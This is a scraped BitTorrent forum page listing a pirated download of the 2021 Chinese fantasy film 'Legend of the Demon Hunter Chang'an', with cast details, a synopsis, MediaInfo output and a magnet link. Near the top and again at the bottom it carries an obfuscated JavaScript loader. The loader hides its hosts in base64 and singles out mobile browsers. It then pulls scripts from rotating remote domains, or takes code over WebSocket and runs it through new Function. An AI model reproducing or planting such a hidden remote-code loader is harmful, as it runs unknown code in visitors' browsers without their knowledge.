长安伏妖[国语配音/中文字幕].Legend.of.the.Demon.Hunter.Chang'an.2021.1080p.WEB-DL.H264.AAC 1.51GB

版主小s 29天前 163

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 长安伏妖

◎年 代 2021

◎产 地 中国大陆

◎类 别 奇幻 / 古装

◎语 言 汉语普通话

◎上映日期 2021-01-08(中国大陆)

◎IMDb链接 https://www.imdb.com/title/tt15295036/

◎豆瓣评分 4.0/10 (4482人评价)

◎豆瓣链接 https://movie.douban.com/subject/34927935/

◎片 长 113分钟

◎导 演 王凯 Kai Wang (id:1338542)

李力持 Lik-Chi Lee (id:1274246)

◎编 剧 吴军平 Junping Wu (id:1353454)

◎演 员 保剑锋 Jianfeng Bao (id:1044611)

克拉拉 Clara Lee (id:1336802)

孙耀威 Eric Suen (id:1017618)

贾冰 Bing Jia (id:1367925)

迟帅 Shuai Chi (id:1274879)

吴孟达 Man Tat Ng (id:1016771)

徐冬冬 Dongdong Xu (id:1315463)

罗家英 Kar-Ying Law (id:1108968)

张磊 Lei Zhang (id:1318092)

安琥 Hu An (id:1316825)

钟夫翔 Fuxiang Zhong (id:1316611)

李子雄 Waise Lee (id:1037662)

周韦彤 Cica Zhou (id:1275947)

邱雨铄 Yushuo Qiu (id:1401822)

雷晨钰 Chenyu Lei (id:1447129)

◎标 签 保剑锋 / 国影 / 孙耀威 / 贾冰 / 李成敏 / 666 / 2021等评分 / 2020等评分

◎简 介

长安六骑司前首领延东的墓遭遇盗墓贼,镇压妖王的玄牝珠被盗,导致长安城妖孽四起,民不聊生。大内总管鱼公公(罗家英 饰)命六骑司的马三(吴孟达 饰)、王诸葛(贾冰 饰)、雷燕(徐冬冬 饰)等人镇压群妖和追寻玄牝珠,并策划着一场惊天的阴谋。盗墓贼逃到一家客栈躲避,结果玄牝珠被厨师李长安(保剑锋 饰)误食。为了心爱的恋人公孙玉(克拉拉 饰)以及解救长安百姓,李长安通过重重考验进入六骑司,最后置之死地而后生,发动玄牝珠的神奇力量伏妖除魔……

  1. ##### MediaInfo ######

  2. General

  3. Complete name : 长安伏妖.Legend.of.the.Demon.Hunter.Chang'[email protected]

  4. Format : MPEG-4

  5. Format profile : Base Media

  6. Codec ID : isom (isom/iso2/avc1/mp41)

  7. File size : 1.50 GiB

  8. Duration : 1 h 52 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 1 917 kb/s

  11. Writing application : Lavf58.17.103


  12. Video

  13. ID : 1

  14. Format : AVC

  15. Format/Info : Advanced Video Codec

  16. Format profile : [email protected]

  17. Format settings : CABAC / 4 Ref Frames

  18. Format settings, CABAC : Yes

  19. Format settings, Reference frames : 4 frames

  20. Codec ID : avc1

  21. Codec ID/Info : Advanced Video Coding

  22. Duration : 1 h 52 min

  23. Bit rate : 1 816 kb/s

  24. Width : 1 920 pixels

  25. Height : 804 pixels

  26. Display aspect ratio : 2.40:1

  27. Frame rate mode : Variable

  28. Frame rate : 24.000 FPS

  29. Minimum frame rate : 23.994 FPS

  30. Maximum frame rate : 24.006 FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.049

  36. Stream size : 1.43 GiB (95%)

  37. Writing library : ptw-1.0.116 rcm-vary vbl-0 vwk

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709

  42. Codec configuration box : avcC


  43. Audio

  44. ID : 2

  45. Format : AAC LC

  46. Format/Info : Advanced Audio Codec Low Complexity

  47. Codec ID : mp4a-40-2

  48. Duration : 1 h 52 min

  49. Bit rate mode : Variable

  50. Bit rate : 93.4 kb/s

  51. Maximum bit rate : 95.6 kb/s

  52. Channel(s) : 2 channels

  53. Channel layout : L R

  54. Sampling rate : 48.0 kHz

  55. Frame rate : 46.875 FPS (1024 SPF)

  56. Compression mode : Lossy

  57. Stream size : 75.1 MiB (5%)

  58. Default : Yes

  59. Alternate group : 1




复制代码


TAGS 奇幻 古装

磁力链:
  • magnet:?xt=urn:btih:D247BACFD59D1716F65897DFDDA7DE0B66B903DC

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};